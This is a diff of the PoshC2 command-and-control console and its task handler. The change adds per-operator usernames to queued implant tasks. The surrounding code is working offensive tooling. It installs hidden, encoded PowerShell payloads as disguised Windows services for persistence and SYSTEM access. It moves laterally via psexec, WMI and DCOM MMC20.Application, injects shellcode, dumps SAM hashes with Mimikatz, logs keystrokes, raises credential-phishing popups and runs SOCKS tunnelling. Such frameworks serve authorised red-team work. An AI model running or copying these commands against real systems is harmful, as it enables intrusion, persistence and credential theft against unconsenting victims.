(implant_id.lower() == "tasks "): alltasks = "" - tasks = get_nettasks_all() + tasks = get_newtasks_all() if tasks is None: - startup("No tasks queued!\r\n") + startup(user, "No tasks queued!\r\n") else: for task in tasks: imname = get_implantdetails(task[1]) alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11],imname[2]),task[2]) - startup("Queued tasks:\r\n\r\n%s" % alltasks) + startup(user, "Queued tasks:\r\n\r\n%s" % alltasks) if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "): - drop_nettasks() - startup("Empty tasks queue\r\n") + drop_newtasks() + startup(user, "Empty tasks queue\r\n") if "quit" in implant_id.lower(): ri = raw_input("Are you sure you want to quit? (Y/n) ") if ri.lower() == "n": - startup() + startup(user) if ri == "": sys.exit(0) if ri.lower() == "y": @@ -379,26 +384,26 @@ def startup(printhelp = ""): createnewpayload() if (implant_id == "?") or (implant_id == "help"): - startup(pre_help) + startup(user, pre_help) if (implant_id.lower() == "history") or implant_id.lower() == "history ": - startup(get_history()) + startup(user, get_history()) if "use " in implant_id.lower(): implant_id = implant_id.replace("use ","") params = re.compile("use ", re.IGNORECASE) implant_id = params.sub("", implant_id) - commandloop(implant_id) + commandloop(implant_id, user) except Exception as e: if 'unable to open database file' in e: - startup() + startup(user) else: traceback.print_exc() print ("Error: %s" % e) print ("Currently no valid implants: sleeping for 10 seconds") time.sleep(10) - startup() + startup(user) def runcommand(command, randomuri): if command: @@ -439,12 +444,12 @@ def runcommand(command, randomuri): sleep = '$sleeptime = %s' % command update_sleep(command, randomuri) - new_task(sleep, randomuri) + new_task(sleep, user, randomuri) elif (command.lower().startswith('label-implant')): label = command.replace('label-implant ', '') update_label(label, randomuri) - startup() + startup(user) elif "searchhelp" in command.lower(): searchterm = (command.lower()).replace("searchhelp ","") @@ -461,7 +466,7 @@ def runcommand(command, randomuri): kill_implant(randomuri) elif command.lower() == 'sai' or command.lower() == 'sai ': - new_task('startanotherimplant', randomuri) + new_task('startanotherimplant', user, randomuri) elif "upload-file" in command.lower(): source = "" @@ -499,16 +504,16 @@ def runcommand(command, randomuri): elif "loadmoduleforce" in command.lower(): params = re.compile("loadmoduleforce ", re.IGNORECASE) params = params.sub("", command) - check_module_loaded(params, randomuri, force=True) + check_module_loaded(params, randomuri, user, force=True) elif "loadmodule" in command.lower(): params = re.compile("loadmodule ", re.IGNORECASE) params = params.sub("", command) - check_module_loaded(params, randomuri) + check_module_loaded(params, randomuri, user) elif 'get-screenshot' in command.lower(): taskcmd = "screencapture -x /tmp/s;base64 /tmp/s;rm /tmp/s" - new_task(taskcmd, randomuri) + new_task(taskcmd, user, randomuri) elif "kill-implant" in command.lower() or "exit" in command.lower(): impid = get_implantdetails(randomuri) @@ -517,15 +522,15 @@ def runcommand(command, randomuri): print ("Implant not terminated") if ri == "": pid = get_pid(randomuri) - new_task("kill -9 %s" % pid,randomuri) + new_task("kill -9 %s" % pid, user, randomuri) kill_implant(randomuri) if ri.lower() == "y": pid = get_pid(randomuri) - new_task("kill -9 %s" % pid,randomuri) + new_task("kill -9 %s" % pid, user, randomuri) kill_implant(randomuri) elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "): - startup() + startup(user) elif "linuxprivchecker" in command.lower(): params = re.compile("linuxprivchecker", re.IGNORECASE) @@ -533,16 +538,16 @@ def runcommand(command, randomuri): module = open("%slinuxprivchecker.py" % ModulesDirectory, 'r').read() encoded_module = base64.b64encode(module) taskcmd = "linuxprivchecker -pycode %s %s" % (encoded_module, params) - new_task(taskcmd, randomuri) + new_task(taskcmd, user, randomuri) else: if command: - new_task(command, randomuri) + new_task(command, user, randomuri) return elif implant_type == "C#": try: - check_module_loaded("Core.exe", randomuri) + check_module_loaded("Core.exe", randomuri, user) except Exception as e: print ("Error loading Core.exe: %s" % e) @@ -582,7 +587,7 @@ def runcommand(command, randomuri): print ("") print ("Uploading %s to %s" % (source, destination)) uploadcommand = "upload-file%s;\"%s\"" % (sourceb64, destination) - new_task(uploadcommand, randomuri) + new_task(uploadcommand, user, randomuri) else: print("Source file could not be read or was empty") except Exception as e: @@ -603,7 +608,7 @@ def runcommand(command, randomuri): shellcodefile = load_file(path) if shellcodefile != None: arch = "64" - new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), randomuri) + new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri) except Exception as e: print ("Error loading file: %s" % e) @@ -613,82 +618,82 @@ def runcommand(command, randomuri): if ri.lower() == "n": print ("Implant not terminated") if ri == "": - new_task("exit",randomuri) + new_task("exit", user, randomuri) kill_implant(randomuri) if ri.lower() == "y": - new_task("exit",randomuri) + new_task("exit",user, randomuri) kill_implant(randomuri) elif "seatbelt " in command.lower(): - check_module_loaded("Seatbelt.exe", randomuri) - new_task(command,randomuri) + check_module_loaded("Seatbelt.exe", randomuri, user) + new_task(command, user, randomuri) elif (command.lower().startswith("stop-keystrokes")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("get-keystrokes")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("get-screenshotmulti")): - new_task(command,randomuri) + new_task(command, user, randomuri) elif (command.lower().startswith("get-screenshot")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("arpscan")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("testadcredential")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("testlocalcredential")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("turtle")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("get-userinfo")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("get-content")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("resolvednsname")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("resolveip")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("cred-popper")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("get-serviceperms")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("move")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("delete")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("ls")): - new_task("run-exe Core.Program Core %s" % command,randomuri) + new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower() == "pwd") or (command.lower() == "pwd "): - new_task("run-exe Core.Program Core pwd",randomuri) + new_task("run-exe Core.Program Core pwd", user, randomuri) elif (command.lower() == "ps") or (command.lower() == "ps "): - new_task("run-exe Core.Program Core Get-ProcessList",randomuri) + new_task("run-exe Core.Program Core Get-ProcessList", user, randomuri) elif "loadmoduleforce" in command.lower(): params = re.compile("loadmoduleforce ", re.IGNORECASE) params = params.sub("", command) - check_module_loaded(params, randomuri, force=True) + check_module_loaded(params, randomuri, user, force=True) elif "loadmodule" in command.lower(): params = re.compile("loadmodule ", re.IGNORECASE) params = params.sub("", command) - check_module_loaded(params, randomuri) + check_module_loaded(params, randomuri, user) elif "listmodules" in command.lower(): modules = os.listdir("%s/Modules/" % POSHDIR) @@ -698,7 +703,7 @@ def runcommand(command, randomuri): for mod in modules: if (".exe" in mod) or (".dll" in mod) : print (mod) - new_task(command,randomuri) + new_task(command, user, randomuri) elif "modulesloaded" in command.lower(): ml = get_implantdetails(randomuri) @@ -708,10 +713,10 @@ def runcommand(command, randomuri): print (sharp_help1) elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "): - startup() + startup(user) elif ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower(): - new_task(command, randomuri) + new_task(command, user, randomuri) command = command.replace('set-beacon ', '') command = command.replace('setbeacon ', '') command = command.replace('beacon ', '') @@ -720,20 +725,20 @@ def runcommand(command, randomuri): elif (command.lower().startswith('label-implant')): label = command.replace('label-implant ', '') update_label(label, randomuri) - startup() + startup(user) else: if command: - new_task(command, randomuri) + new_task(command, user, randomuri) return else: try: - check_module_loaded("Core.ps1", randomuri) + check_module_loaded("Core.ps1", randomuri, user) except Exception as e: print ("Error loading Core.ps1: %s" % e) - run_autoloads(command, randomuri) + run_autoloads(command, randomuri, user) # alias mapping for alias in ps_alias: @@ -755,7 +760,7 @@ def runcommand(command, randomuri): command = command if ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower(): - new_task(command, randomuri) + new_task(command, user, randomuri) command = command.replace('set-beacon ', '') command = command.replace('setbeacon ', '') command = command.replace('beacon ', '') @@ -764,7 +769,7 @@ def runcommand(command, randomuri): elif (command.lower().startswith('label-implant')): label = command.replace('label-implant ', '') update_label(label, randomuri) - startup() + startup(user) elif "searchhelp" in command.lower(): searchterm = (command.lower()).replace("searchhelp ","") @@ -775,19 +780,19 @@ def runcommand(command, randomuri): print (line) elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "): - startup() + startup(user) elif "install-servicelevel-persistencewithproxy" in command.lower(): C2 = get_c2server_all() if C2[11] == "": - startup("Need to run createproxypayload first") + startup(user, "Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload) - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) elif "install-servicelevel-persistence" in command.lower(): C2 = get_c2server_all() @@ -796,30 +801,30 @@ def runcommand(command, randomuri): C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload) - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) elif "remove-servicelevel-persistence" in command.lower(): - new_task("sc.exe delete CPUpdater", randomuri) + new_task("sc.exe delete CPUpdater", user, randomuri) # psexec lateral movement elif "get-implantworkingdirectory" in command.lower(): - new_task("pwd", randomuri) + new_task("pwd", user, randomuri) elif "get-system-withproxy" in command.lower(): C2 = get_c2server_all() if C2[11] == "": - startup("Need to run createproxypayload first") + startup(user, "Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) elif "get-system-withdaisy" in command.lower(): C2 = get_c2server_all() @@ -827,11 +832,11 @@ def runcommand(command, randomuri): if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) elif "get-system" in command.lower(): C2 = get_c2server_all() @@ -840,46 +845,46 @@ def runcommand(command, randomuri): C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) elif "quit" in command.lower(): ri = raw_input("Are you sure you want to quit? (Y/n) ") if ri.lower() == "n": - startup() + startup(user) if ri == "": sys.exit(0) if ri.lower() == "y": sys.exit(0) elif "invoke-psexecproxypayload" in command.lower(): - check_module_loaded("Invoke-PsExec.ps1", randomuri) + check_module_loaded("Invoke-PsExec.ps1", randomuri, user) if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))): with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read() params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-psexec %s -command \"%s\"" % (params,payload) - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) else: - startup("Need to run createproxypayload first") + startup(user, "Need to run createproxypayload first") elif "invoke-psexecdaisypayload" in command.lower(): - check_module_loaded("Invoke-PsExec.ps1", randomuri) + check_module_loaded("Invoke-PsExec.ps1", randomuri, user) daisyname = raw_input("Payload name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() params = re.compile("invoke-psexecdaisypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-psexec %s -command \"%s\"" % (params,payload) - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) else: - startup("Need to run createdaisypayload first") + startup(user, "Need to run createdaisypayload first") elif "invoke-psexecpayload" in command.lower(): - check_module_loaded("Invoke-PsExec.ps1", randomuri) + check_module_loaded("Invoke-PsExec.ps1", randomuri, user) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], @@ -888,35 +893,35 @@ def runcommand(command, randomuri): params = re.compile("invoke-psexecpayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload) - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) # wmi lateral movement elif "invoke-wmiproxypayload" in command.lower(): - check_module_loaded("Invoke-WMIExec.ps1", randomuri) + check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))): with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read() params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload) - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) else: - startup("Need to run createproxypayload first") + startup(user, "Need to run createproxypayload first") elif "invoke-wmidaisypayload" in command.lower(): - check_module_loaded("Invoke-WMIExec.ps1", randomuri) + check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) daisyname = raw_input("Name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() params = re.compile("invoke-wmidaisypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload) - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) else: - startup("Need to run createdaisypayload first") + startup(user, "Need to run createdaisypayload first") elif "invoke-wmipayload" in command.lower(): - check_module_loaded("Invoke-WMIExec.ps1", randomuri) + check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], @@ -925,7 +930,7 @@ def runcommand(command, randomuri): params = re.compile("invoke-wmipayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload) - new_task(cmd, randomuri) + new_task(cmd, user, randomuri) # dcom lateral movement @@ -937,9 +942,9 @@ def runcommand(command, randomuri): p = re.compile(ur'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload) - new_task(pscommand, randomuri) + new_task(pscommand, user, randomuri) else: - startup("Need to run createproxypayload first") + startup(user, "Need to run createproxypayload first") elif "invoke-dcomdaisypayload" in command.lower(): daisyname = raw_input("Name required: ") @@ -948,9 +953,9 @@ def runcommand(command, randomuri): p = re.compile(ur'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) - new_task(pscommand, randomuri) + new_task(pscommand, user, randomuri) else: - startup("Need to run createdaisypayload first") + startup(user, "Need to run createdaisypayload first") elif "invoke-dcompayload" in command.lower(): C2 = get_c2server_all() @@ -961,7 +966,7 @@ def runcommand(command, randomuri): p = re.compile(ur'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) - new_task(pscommand, randomuri) + new_task(pscommand, user, randomuri) # runas payloads @@ -969,44 +974,44 @@ def runcommand(command, randomuri): daisyname = raw_input("Name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() - new_task("$proxypayload = \"%s\"" % payload, randomuri) - check_module_loaded("Invoke-RunAs.ps1", randomuri) - check_module_loaded("NamedPipeDaisy.ps1", randomuri) + new_task("$proxypayload = \"%s\"" % payload, user, randomuri) + check_module_loaded("Invoke-RunAs.ps1", randomuri, user) + check_module_loaded("NamedPipeDaisy.ps1", randomuri, user) params = re.compile("invoke-runasdaisypayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSDaisy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE'))) - new_task(pscommand, randomuri) + new_task(pscommand, user, randomuri) else: - startup("Need to run createdaisypayload first") + startup(user, "Need to run createdaisypayload first") elif "invoke-runasproxypayload" in command.lower(): C2 = get_c2server_all() if C2[11] == "": - startup("Need to run createproxypayload first") + startup(user, "Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload - new_task(proxyvar, randomuri) - check_module_loaded("Invoke-RunAs.ps1", randomuri) - check_module_loaded("NamedPipeProxy.ps1", randomuri) + new_task(proxyvar, user, randomuri) + check_module_loaded("Invoke-RunAs.ps1", randomuri, user) + check_module_loaded("NamedPipeProxy.ps1", randomuri, user) params = re.compile("invoke-runasproxypayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE'))) - new_task(pscommand, randomuri) + new_task(pscommand, user, randomuri) elif "invoke-runaspayload" in command.lower(): - check_module_loaded("Invoke-RunAs.ps1", randomuri) - check_module_loaded("NamedPipe.ps1", randomuri) + check_module_loaded("Invoke-RunAs.ps1", randomuri, user) + check_module_loaded("NamedPipe.ps1", randomuri, user) params = re.compile("invoke-runaspayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE'))) - new_task(pscommand, randomuri) + new_task(pscommand, user, randomuri) elif command.lower() == "help" or command == "?" or command.lower() == "help ": print (posh_help) @@ -1060,7 +1065,7 @@ def runcommand(command, randomuri): uploadcommand = "Upload-File -Destination \"%s\" -NotHidden %s -Base64 %s" % (destination, nothidden, sourceb64) else: uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, sourceb64) - new_task(uploadcommand, randomuri) + new_task(uploadcommand, user, randomuri) else: print("Source file could not be read or was empty") except Exception as e: @@ -1073,10 +1078,10 @@ def runcommand(command, randomuri): if ri.lower() == "n": print ("Implant not terminated") if ri == "": - new_task("exit", randomuri) + new_task("exit", user, randomuri) kill_implant(randomuri) if ri.lower() == "y": - new_task("exit", randomuri) + new_task("exit", user, randomuri) kill_implant(randomuri) elif "unhide-implant" in command.lower(): @@ -1093,24 +1098,24 @@ def runcommand(command, randomuri): elif "loadmoduleforce" in command.lower(): params = re.compile("loadmoduleforce ", re.IGNORECASE) params = params.sub("", command) - check_module_loaded(params, randomuri, force=True) + check_module_loaded(params, randomuri, user, force=True) elif "loadmodule" in command.lower(): params = re.compile("loadmodule ", re.IGNORECASE) params = params.sub("", command) - check_module_loaded(params, randomuri) + check_module_loaded(params, randomuri, user) elif "invoke-daisychain" in command.lower(): - check_module_loaded("Invoke-DaisyChain.ps1", randomuri) + check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user) urls = get_allurls() - new_task("%s -URLs '%s'" % (command,urls), randomuri) + new_task("%s -URLs '%s'" % (command,urls), user, randomuri) print ("Now use createdaisypayload") elif "inject-shellcode" in command.lower(): #elif (command.lower() == "inject-shellcode") or (command.lower() == "inject-shellcode "): params = re.compile("inject-shellcode", re.IGNORECASE) params = params.sub("", command) - check_module_loaded("Inject-Shellcode.ps1", randomuri) + check_module_loaded("Inject-Shellcode.ps1", randomuri, user) readline.set_completer(filecomplete) path = raw_input("Location of shellcode file: ") t = tabCompleter() @@ -1120,8 +1125,8 @@ def runcommand(command, randomuri): shellcodefile = load_file(path) if shellcodefile != None: arch = "64" - new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri) - new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), randomuri) + new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri) + new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri) except Exception as e: print ("Error loading file: %s" % e) @@ -1133,14 +1138,14 @@ def runcommand(command, randomuri): print (ml[14]) elif (command.lower() == "ps") or (command.lower() == "ps "): - new_task("get-processlist", randomuri) + new_task("get-processlist", user, randomuri) elif (command.lower() == "hashdump") or (command.lower() == "hashdump "): - check_module_loaded("Invoke-Mimikatz.ps1", randomuri) - new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", randomuri) + check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user) + new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri) elif (command.lower() == "sharpsocks") or (command.lower() == "sharpsocks "): - check_module_loaded("SharpSocks.ps1", randomuri) + check_module_loaded("SharpSocks.ps1", randomuri, user) import string from random import choice allchar = string.ascii_letters @@ -1148,17 +1153,17 @@ def runcommand(command, randomuri): sharpkey = gen_key() sharpurls = get_sharpurls() sharpurl = select_item("HostnameIP", "C2Server") - new_task("Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 2000" % (sharpurl,channel,sharpkey,sharpurls), randomuri) + new_task("Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 2000" % (sharpurl,channel,sharpkey,sharpurls), user, randomuri) print ("git clone https://github.com/nettitude/SharpSocks.git") print ("SharpSocksServerTestApp.exe -c %s -k %s -l http://IPADDRESS:8080" % (channel,sharpkey)) elif (command.lower() == "history") or command.lower() == "history ": - startup(get_history()) + startup(user, get_history()) elif "reversedns" in command.lower(): params = re.compile("reversedns ", re.IGNORECASE) params = params.sub("", command) - new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, randomuri) + new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri) elif "createdaisypayload" in command.lower(): createdaisypayload() @@ -1171,11 +1176,11 @@ def runcommand(command, randomuri): else: if command: - new_task(command, randomuri) + new_task(command, user, randomuri) return return -def commandloop(implant_id): +def commandloop(implant_id, user): while(True): try: implant_id_orig = implant_id @@ -1206,7 +1211,7 @@ def commandloop(implant_id): # if "all" run through all implants get_implants() if implant_id.lower() == "all": if command == "back": - startup() + startup(user) implant_split = get_implants() if implant_split: for implant_id in implant_split: @@ -1232,7 +1237,7 @@ def commandloop(implant_id): runcommand(command, implant_id) # then run back around - commandloop(implant_id_orig) + commandloop(implant_id_orig, user) #is this required for a while loop? looks like it would lead to a stackoverflow anyway? except Exception as e: print (Colours.RED) @@ -1242,9 +1247,15 @@ def commandloop(implant_id): #print "Error: %s" % e # remove the following comment when publishing to live time.sleep(1) - startup() + startup(user, user) if __name__ == '__main__': original_sigint = signal.getsignal(signal.SIGINT) signal.signal(signal.SIGINT, catch_exit) - startup() + parser = argparse.ArgumentParser(description='The command line for handling implants in PoshC2') + parser.add_argument('-u', '--user', help='the user for this session') + args = parser.parse_args() + user = args.user + if LogUsers is True and user is None: + user = raw_input("Enter your username: ") + startup(user) diff --git a/Tasks.py b/Tasks.py index a5850ad..2fdf5dc 100644 --- a/Tasks.py +++ b/Tasks.py @@ -15,6 +15,7 @@ def newTask(path): if RandomURI in path and tasks: for a in tasks: command = a[2] + user = a[3] user_command = command hostinfo = DB.get_hostinfo(RandomURI) now = datetime.datetime.now() @@ -48,7 +49,7 @@ def newTask(path): except Exception as e: print "Cannot find module, loadmodule is case sensitive!" print e - taskId = DB.insert_task(RandomURI, user_command, None) + taskId = DB.insert_task(RandomURI, user_command, user) if len(str(taskId)) > 5: raise ValueError('Task ID is greater than 5 characters which is not supported.') taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId) @@ -58,8 +59,6 @@ def newTask(path): else: commands += command DB.del_newtasks(str(a[0])) - - if commands is not None: multicmd = "multicmd%s" % commands try: